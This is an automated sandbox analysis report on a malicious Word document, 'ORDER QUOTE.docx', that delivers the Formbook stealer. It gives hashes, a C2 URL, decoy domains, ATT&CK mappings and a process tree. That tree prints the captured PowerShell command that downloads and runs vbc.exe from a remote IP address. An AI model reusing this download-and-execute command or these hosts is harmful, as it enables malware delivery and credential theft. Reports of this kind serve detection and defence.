Overview

overview

10

Static

static

10

ORDER QUOTE.docx

windows7_x64

10

ORDER QUOTE.docx

windows10_x64

1

Analysis

  • max time kernel
    150s
  • max time network
    157s
  • platform
    windows7_x64
  • resource
    win7-en-20210920
  • submitted
    22-09-2021 20:12

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ORDER QUOTE.docx

  • Size

    10KB

  • MD5

    eee70c12ab889fd6173de81fbc9a6817

  • SHA1

    673a841da220e5ba72e5f30d1d566569595ed352

  • SHA256

    7c41d53d6dd4f2979bfcdea462feef025b2f31cf55644f927ece5f4699a1b7a9

  • SHA512

    7647f0d5adcd468a6cbae4900ecb2887de0a0f89ba25893379f905f04b7b9ee0fa89af755c8cb1db8e4d613f11a8f9f80334de3e784677d1fac1ad51cc9db8d7

Score
10/10
formbookm8g0ratspywarestealersuricatatrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://198.46.199.161/joo/vbc.exe

Extracted

Family

formbook

Version

4.1

Campaign

m8g0

C2

http://www.psicologarenatacruz.com/m8g0/

Decoy

trypapaya.pro

instructorcornernet.com

techadvisorsfl.com

raunnan.com

filestune.com

learnitanywhereskills.com

beaullife.com

getcovidwear.com

tkrbeautyinstitut.com

lisaphamkhai.com

iconicdds.com

ksoopawlas.com

testosteron.store

jctaketwo.com

awexz.online

onlinening.com

steelwerkschicago.com

lukakordic.com

expertsofcoaching.com

dashcca.com

Signatures

  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

    trojanspywarestealerformbook
  • suricata: ET MALWARE FormBook CnC Checkin (GET)

    suricata: ET MALWARE FormBook CnC Checkin (GET)

    suricata
  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata
  • Formbook Payload 3 IoCs
    rat
  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 3 IoCs
  • Abuses OpenXML format to download file from external location 2 IoCs
  • Loads dropped DLL 4 IoCs
  • Uses the VBS compiler for execution 1 TTPs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

    exploit
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 20 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:1264
    • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ORDER QUOTE.docx"
      2⤵
      • Abuses OpenXML format to download file from external location
      • Drops file in Windows directory
      • Modifies Internet Explorer settings
      • Modifies registry class
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1104
      • C:\Windows\splwow64.exe
        C:\Windows\splwow64.exe 12288
        3⤵
          PID:1180
    • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      1⤵
      • Blocklisted process makes network request
      • Loads dropped DLL
      • Launches Equation Editor
      • Suspicious use of WriteProcessMemory
      PID:572
      • C:\Users\Public\regasm.exe
        "C:\Users\Public\regasm.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:1812
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c powershell "(New-Object System.Net.WebClient).DownloadFile('http://198.46.199.161/joo/vbc.exe', (Join-Path -Path $env:Temp -ChildPath 'vbc.exe'))" & powershell "Start-Process -FilePath (Join-Path -Path $env:Temp -ChildPath 'vbc.exe')" & exit
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:376
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell "(New-Object System.Net.WebClient).DownloadFile('http://198.46.199.161/joo/vbc.exe', (Join-Path -Path $env:Temp -ChildPath 'vbc.exe'))"
            4⤵
            • Blocklisted process makes network request
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1748
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell "Start-Process -FilePath (Join-Path -Path $env:Temp -ChildPath 'vbc.exe')"
            4⤵
            • Loads dropped DLL
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1592
            • C:\Users\Admin\AppData\Local\Temp\vbc.exe
              "C:\Users\Admin\AppData\Local\Temp\vbc.exe"
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • Suspicious use of WriteProcessMemory
              PID:1472
              • C:\Users\Admin\AppData\Local\Temp\vbc.exe
                "C:\Users\Admin\AppData\Local\Temp\vbc.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:1732
                • C:\Windows\SysWOW64\NETSTAT.EXE
                  "C:\Windows\SysWOW64\NETSTAT.EXE"
                  7⤵
                  • Suspicious use of SetThreadContext
                  • Gathers network information
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious behavior: MapViewOfSection
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:1032
                  • C:\Windows\SysWOW64\cmd.exe
                    /c del "C:\Users\Admin\AppData\Local\Temp\vbc.exe"
                    8⤵
                      PID:1120

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Initial Access

      Execution

      Scripting

      1
      T1064

      Command-Line Interface

      1
      T1059

      Exploitation for Client Execution

      1
      T1203

      Persistence

      Privilege Escalation

      Defense Evasion

      Scripting

      1
      T1064

      Modify Registry

      1
      T1112

      Credential Access

      Discovery

      System Information Discovery

      1
      T1082

      Lateral Movement

      Collection

      Exfiltration

      Command and Control

      Impact

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\vbc.exe
        MD5

        3dac10541270990e15c8742b0cd6f153

        SHA1

        ed5c87e500c51e055ddb9160929a3dac51d3a393

        SHA256

        744e1148859c05acf0cb4aac84f5687c5106268c30db72a31529b67695028a5f

        SHA512

        66f408fefd562558c96749981784157ac480895867e6612a410f8ebad6af05547e0fdae4431f1ddb136d2086d7acf2927ccff0d60b1adc44144c8bf1507589d1

        Download Submit
      • C:\Users\Admin\AppData\Local\Temp\vbc.exe
        MD5

        3dac10541270990e15c8742b0cd6f153

        SHA1

        ed5c87e500c51e055ddb9160929a3dac51d3a393

        SHA256

        744e1148859c05acf0cb4aac84f5687c5106268c30db72a31529b67695028a5f

        SHA512

        66f408fefd562558c96749981784157ac480895867e6612a410f8ebad6af05547e0fdae4431f1ddb136d2086d7acf2927ccff0d60b1adc44144c8bf1507589d1

        Download Submit
      • C:\Users\Admin\AppData\Local\Temp\vbc.exe
        MD5

        3dac10541270990e15c8742b0cd6f153

        SHA1

        ed5c87e500c51e055ddb9160929a3dac51d3a393

        SHA256

        744e1148859c05acf0cb4aac84f5687c5106268c30db72a31529b67695028a5f

        SHA512

        66f408fefd562558c96749981784157ac480895867e6612a410f8ebad6af05547e0fdae4431f1ddb136d2086d7acf2927ccff0d60b1adc44144c8bf1507589d1

        Download Submit
      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
        MD5

        98452948bf0ef2e253e6a7fb03276fd5

        SHA1

        89aa6864d4bb558f036b24c74d870517701ec3f3

        SHA256

        151135496a0c66040eeb12bc2c5489c87221094ab17da5a981c574686a524c7d

        SHA512

        661eda145d7d0f1a3fa44cc4ea9a09d8eba39f1e3a3cc42cb60ead043b2ac60077070b95db36ce599966d1f6a9906294d5330abad6b9c0e9520c2459e68fe26f

        Download Submit
      • C:\Users\Public\regasm.exe
        MD5

        7f06feab552ff5b4b5ea9c0c08a50982

        SHA1

        fec42fd952353328a01939c949ccb7031be50530

        SHA256

        053e45fb6090b18e9a8ff0a8c24fd2d77eca4057539b1add95e03c38be35b3a0

        SHA512

        9c5877c7851e8d6b000c729948b330ab66e69a18205b3ac5de70b4907360f3fb4541e6745312f7deb08f1a046fb2470e13ab9ca326e0e2f478819ecaa47e9be0

        Download Submit
      • \Users\Admin\AppData\Local\Temp\vbc.exe
        MD5

        3dac10541270990e15c8742b0cd6f153

        SHA1

        ed5c87e500c51e055ddb9160929a3dac51d3a393

        SHA256

        744e1148859c05acf0cb4aac84f5687c5106268c30db72a31529b67695028a5f

        SHA512

        66f408fefd562558c96749981784157ac480895867e6612a410f8ebad6af05547e0fdae4431f1ddb136d2086d7acf2927ccff0d60b1adc44144c8bf1507589d1

        Download Submit
      • \Users\Admin\AppData\Local\Temp\vbc.exe
        MD5

        3dac10541270990e15c8742b0cd6f153

        SHA1

        ed5c87e500c51e055ddb9160929a3dac51d3a393

        SHA256

        744e1148859c05acf0cb4aac84f5687c5106268c30db72a31529b67695028a5f

        SHA512

        66f408fefd562558c96749981784157ac480895867e6612a410f8ebad6af05547e0fdae4431f1ddb136d2086d7acf2927ccff0d60b1adc44144c8bf1507589d1

        Download Submit
      • \Users\Public\regasm.exe
        MD5

        7f06feab552ff5b4b5ea9c0c08a50982

        SHA1

        fec42fd952353328a01939c949ccb7031be50530

        SHA256

        053e45fb6090b18e9a8ff0a8c24fd2d77eca4057539b1add95e03c38be35b3a0

        SHA512

        9c5877c7851e8d6b000c729948b330ab66e69a18205b3ac5de70b4907360f3fb4541e6745312f7deb08f1a046fb2470e13ab9ca326e0e2f478819ecaa47e9be0

        Download Submit
      • \Users\Public\regasm.exe
        MD5

        7f06feab552ff5b4b5ea9c0c08a50982

        SHA1

        fec42fd952353328a01939c949ccb7031be50530

        SHA256

        053e45fb6090b18e9a8ff0a8c24fd2d77eca4057539b1add95e03c38be35b3a0

        SHA512

        9c5877c7851e8d6b000c729948b330ab66e69a18205b3ac5de70b4907360f3fb4541e6745312f7deb08f1a046fb2470e13ab9ca326e0e2f478819ecaa47e9be0

        Download Submit
      • memory/376-65-0x0000000000000000-mapping.dmp
        Download
      • memory/1032-98-0x00000000000C0000-0x00000000000EF000-memory.dmp
        Filesize

        188KB

        Download
      • memory/1032-97-0x00000000009F0000-0x00000000009F9000-memory.dmp
        Filesize

        36KB

        Download
      • memory/1032-101-0x0000000001F50000-0x0000000001FE4000-memory.dmp
        Filesize

        592KB

        Download
      • memory/1032-100-0x0000000002220000-0x0000000002523000-memory.dmp
        Filesize

        3.0MB

        Download
      • memory/1032-96-0x0000000000000000-mapping.dmp
        Download
      • memory/1104-54-0x0000000072A31000-0x0000000072A34000-memory.dmp
        Filesize

        12KB

        Download
      • memory/1104-102-0x000000005FFF0000-0x0000000060000000-memory.dmp
        Filesize

        64KB

        Download
      • memory/1104-57-0x0000000075821000-0x0000000075823000-memory.dmp
        Filesize

        8KB

        Download
      • memory/1104-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
        Filesize

        64KB

        Download
      • memory/1104-55-0x00000000704B1000-0x00000000704B3000-memory.dmp
        Filesize

        8KB

        Download
      • memory/1120-99-0x0000000000000000-mapping.dmp
        Download
      • memory/1180-64-0x000007FEFBE61000-0x000007FEFBE63000-memory.dmp
        Filesize

        8KB

        Download
      • memory/1180-63-0x0000000000000000-mapping.dmp
        Download
      • memory/1264-93-0x0000000006E20000-0x0000000006FC8000-memory.dmp
        Filesize

        1.7MB

        Download
      • memory/1264-95-0x0000000007540000-0x00000000076D9000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/1264-103-0x00000000080B0000-0x0000000008230000-memory.dmp
        Filesize

        1.5MB

        Download
      • memory/1472-85-0x00000000048E0000-0x0000000004941000-memory.dmp
        Filesize

        388KB

        Download
      • memory/1472-84-0x0000000004E30000-0x0000000004E31000-memory.dmp
        Filesize

        4KB

        Download
      • memory/1472-86-0x0000000001350000-0x0000000001382000-memory.dmp
        Filesize

        200KB

        Download
      • memory/1472-83-0x0000000000C80000-0x0000000000C9D000-memory.dmp
        Filesize

        116KB

        Download
      • memory/1472-81-0x0000000001390000-0x0000000001391000-memory.dmp
        Filesize

        4KB

        Download
      • memory/1472-79-0x0000000000000000-mapping.dmp
        Download
      • memory/1592-76-0x0000000002222000-0x0000000002224000-memory.dmp
        Filesize

        8KB

        Download
      • memory/1592-75-0x0000000002221000-0x0000000002222000-memory.dmp
        Filesize

        4KB

        Download
      • memory/1592-74-0x0000000002220000-0x0000000002221000-memory.dmp
        Filesize

        4KB

        Download
      • memory/1592-73-0x0000000004BA0000-0x00000000050D6000-memory.dmp
        Filesize

        5.2MB

        Download
      • memory/1592-70-0x0000000000000000-mapping.dmp
        Download
      • memory/1732-92-0x00000000002B0000-0x00000000002C5000-memory.dmp
        Filesize

        84KB

        Download
      • memory/1732-94-0x00000000002F0000-0x0000000000305000-memory.dmp
        Filesize

        84KB

        Download
      • memory/1732-91-0x0000000000930000-0x0000000000C33000-memory.dmp
        Filesize

        3.0MB

        Download
      • memory/1732-89-0x000000000041F1B0-mapping.dmp
        Download
      • memory/1732-88-0x0000000000400000-0x000000000042F000-memory.dmp
        Filesize

        188KB

        Download
      • memory/1748-69-0x0000000004AF0000-0x0000000005026000-memory.dmp
        Filesize

        5.2MB

        Download
      • memory/1748-68-0x0000000002590000-0x00000000031DA000-memory.dmp
        Filesize

        12.3MB

        Download
      • memory/1748-66-0x0000000000000000-mapping.dmp
        Download
      • memory/1812-61-0x0000000000000000-mapping.dmp
        Download